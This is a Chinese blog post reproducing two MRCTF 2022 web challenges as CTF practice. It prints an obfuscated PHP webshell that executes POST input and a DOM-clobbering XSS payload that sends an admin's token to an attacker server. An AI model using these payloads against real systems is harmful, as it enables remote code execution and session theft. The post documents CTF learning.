2022MRCTF复现

ctf
发布日期:   2022-04-25
更新日期:   2022-05-27
文章字数:   827
阅读时长:   3 分
阅读次数:  

我太菜了,只能靠看别人的wp来复现过日子了

WebCheckIn

好骚的思路,从来没有想过能这样

一个只能传php文件的文件上传,但是检测到一些命令执行或者其他的内容就会报错。

方法一

r4kapig的wp里的方式,利用new ERROR(1);来抛出错误

image-20220425215113191

image-20220425215120212

但是事实上这应该是这道题的后端用来过滤上传的php文件里的内容的代码导致的,这个检测感觉有点神奇。利用new一个类之后后边不管是什么都能传上去,只不过只有new一个php的基类时上传的php文件才不会因为报错而导致停止执行。也就是说,这里随便new一个基类就行

image-20220425215459825

image-20220425215526239

然后执行grep命令找flag就行

方法二

这是wm的wp里的方法

一个靠构造CHR以及动态拼接特性构造出的一个很离谱的webshell

<?php
(((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((9.9999999999999999^9).(9.9999999999999999^9).(9.9999999999999999^9))^((99).(9))^((9).(9.9999999999999999))^((9^9).(9.9999999999999999^9^99.999999999999999^99).(9^9))^((9^9).(9^9).(9^9))^((99.9).(9)))(((.999999999999999).(.999999999999999).((9.9999999999999999^9)^((.999999999999999)^(9^((.999999999999999).(.999999999999999)))^(9.9999999999999999^9^99.999999999999999^99)))))).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((9.9999999999999999^9).(9.9999999999999999^9).(9.9999999999999999^9))^((99).(9))^((9).(9.9999999999999999))^((9^9).(9.9999999999999999^9^99.999999999999999^99).(9^9))^((9^9).(9^9).(9^9))^((99.9).(9)))(((.999999999999999).(9^((.999999999999999).(.999999999999999))).(.999999999999999)))).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((9.9999999999999999^9).(9.9999999999999999^9).(9.9999999999999999^9))^((99).(9))^((9).(9.9999999999999999))^((9^9).(9.9999999999999999^9^99.999999999999999^99).(9^9))^((9^9).(9^9).(9^9))^((99.9).(9)))(((.999999999999999).(.999999999999999).((9.9999999999999999^9)^((.999999999999999)^(9^((.999999999999999).(.999999999999999)))^(9.9999999999999999^9^99.999999999999999^99)))))).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((9.9999999999999999^9).(9.9999999999999999^9).(9.9999999999999999^9))^((99).(9))^((9).(9.9999999999999999))^((9^9).(9.9999999999999999^9^99.999999999999999^99).(9^9))^((9^9).(9^9).(9^9))^((99.9).(9)))(((.999999999999999).(.999999999999999).((.999999999999999)^(9^((.999999999999999).(.999999999999999)))^(9.9999999999999999^9^99.999999999999999^99))))).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((9.9999999999999999^9).(9.9999999999999999^9).(9.9999999999999999^9))^((99).(9))^((9).(9.9999999999999999))^((9^9).(9.9999999999999999^9^99.999999999999999^99).(9^9))^((9^9).(9^9).(9^9))^((99.9).(9)))(((.999999999999999).(9^9).(.999999999999999)))).((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((9.9999999999999999^9).(9.9999999999999999^9).(9.9999999999999999^9))^((99).(9))^((9).(9.9999999999999999))^((9^9).(9.9999999999999999^9^99.999999999999999^99).(9^9))^((9^9).(9^9).(9^9))^((99.9).(9)))(((.999999999999999).(9^9).(9)))))($_POST[1])
?>

image-20220425220952133

image-20220425221006937

God_of_GPA

先注册个账号,然后登录

image-20220425230157304

我们可以看到这里有token,这应该是负责认证用户身份的。

登录之后在查看成绩里有个只有管理员才能看的按钮,而且我们还可以发垃圾话,然后将id提交给管理员让他看。这道题就是让我们利用xss来获取管理员的token来得到flag

<div id="scrip">
console.log("injected");
let uri = window.location.href + "";
if (uri.indexOf('token') > -1){
    location.href="//服务器ip/flag?f="+encodeURIComponent(uri)
}else{
 location.href="http://brtserver.node3.mrctf.fun/oauth/authorize?redirect_uri="+window.location.href
}
</div>
<img src='data:,"onerror="eval(scrip.innerText)' id="MyImg" />

然后我们将uuid提交给管理员

就可以在服务器的日志里找到管理员的token

image-20220425230709447

回到login路径下把token换掉就行了

image-20220425230756857

image-20220425230836819

这里xss的利用好像主要是Dom Clobbering技术来触发的dom型xss

(说起来因为dom型xss利用的少,我还是第一次见

使用 Dom Clobbering 扩展 XSS - 先知社区 (aliyun.com)

附一个出题人写的

MRCTF2022_God_of_GPA_WP - Welcome to fallingblog (ibukifalling.github.io)

发现好像只有这两个能复现。。。其他的都是Java安全了,放一下y4师傅的java题的wp,以后学会Java之后再看

2022MRCTF-Java部分 | Y4tacker's Blog

文章作者: Ethe
文章链接: https://Ethe448.github.io/2022/04/25/2022MRCTF%E5%A4%8D%E7%8E%B0/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Ethe !
ctf
评论
  目录